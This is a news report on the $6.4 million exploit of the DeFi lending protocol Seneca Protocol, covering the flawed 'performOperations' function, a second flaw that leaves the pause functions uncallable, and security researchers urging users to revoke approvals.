Decentralized finance (DeFi) lending platform and stablecoin issuer, Seneca Protocol, announced on February 28th that it had fallen victim to an exploit, resulting in estimated losses of $6.4 million. The protocol’s official X account revealed this information in a statement. According to a report by CertiK, a blockchain analytics firm, the team at Seneca Protocol is currently working with security specialists to investigate the bug that led to the exploit. They are urging users to revoke approvals for the affected contracts.
Seneca Protocol is a DeFi lending application that enables users to deposit various cryptocurrencies as collateral. These collateralized assets can then be used to mint and borrow the platform’s native stablecoin, SenecaUSD.
Blockchain data indicates that an account ending in 42DC was able to transfer approximately 1,385.23 Pendleton Kelp restaked Ether (PT Kelp rsETH) from a Seneca collateral pool. This was achieved by calling the “performOperations” function. Subsequently, the account swapped these tokens for around $4 million worth of Ether (ETH) through three transactions. Afterward, the account transferred an additional 717.04 ETH derivative tokens from different collateral pools and exchanged them for ETH.
CertiK’s report claims that these transfers were carried out maliciously. It attributes the exploit to a flaw in the protocol’s “performOperations” function, which allows any account to call the function and specify OPERATION_CALL as the desired action. This enables the attacker to perform external calls to any address, as they have full control over the callee and callData. Consequently, the attacker was able to drain funds from a collateral pool they did not own.
Spreek, a blockchain investigator, also warned users about the exploit, describing it as a critical vulnerability. Spreek advised users to revoke approvals for the addresses used in the attack.
Additionally, security researcher ddimitrov22 identified another vulnerability in Seneca Protocol that prevents developers from pausing the Seneca contracts. The pause and unpause functions in these contracts contain the keyword “internal,” making it impossible to call them.
The Seneca Protocol development team acknowledged the attack and assured users that an investigation is underway. They plan to provide an update on the situation soon.
Unfortunately, hacks and exploits continue to pose a threat to Web3 users in 2024. On February 23rd, Jeff “Jihoz” Zirlin, the co-founder of Axie Infinity, lost $9.7 million from a hack on his personal wallets. On the same day, the DeFi protocol Blueberry was exploited, resulting in a loss of 457 ETH.